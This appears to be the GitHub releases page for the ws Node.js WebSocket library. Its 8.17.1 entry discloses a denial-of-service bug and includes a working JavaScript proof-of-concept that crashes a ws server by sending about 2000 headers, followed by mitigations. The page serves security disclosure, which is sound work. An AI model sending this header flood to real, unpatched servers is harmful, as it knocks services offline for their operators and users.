Releases: websockets/ws
Releases · websockets/ws
8.17.1
Bug fixes
- Fixed a DoS vulnerability (#2231).
A request with a number of headers exceeding theserver.maxHeadersCount
threshold could be used to crash a ws server.
const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j < chars.length; j++) {
const key = chars[i] + chars[j];
headers[key] = 'x';
if (++count === 2000) break;
}
}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});The vulnerability was reported by Ryan LaPointe in #2230.
In vulnerable versions of ws, the issue can be mitigated in the following ways:
- Reduce the maximum allowed length of the request headers using the
--max-http-header-size=sizeand/or themaxHeaderSizeoptions so
that no more headers than theserver.maxHeadersCountlimit can be sent. - Set
server.maxHeadersCountto0so that no limit is applied.
7.5.10
6.2.3
5.2.4
8.17.0
8.16.0
8.15.1
Notable changes
- The
allowMultipleEventsPerMicrotaskoption has been renamed to
allowSynchronousEvents(4ed7fe5).
This is a breaking change in a patch release that could have been avoided with
an alias, but the renamed option was added only 3 days ago, so hopefully it
hasn't already been widely used.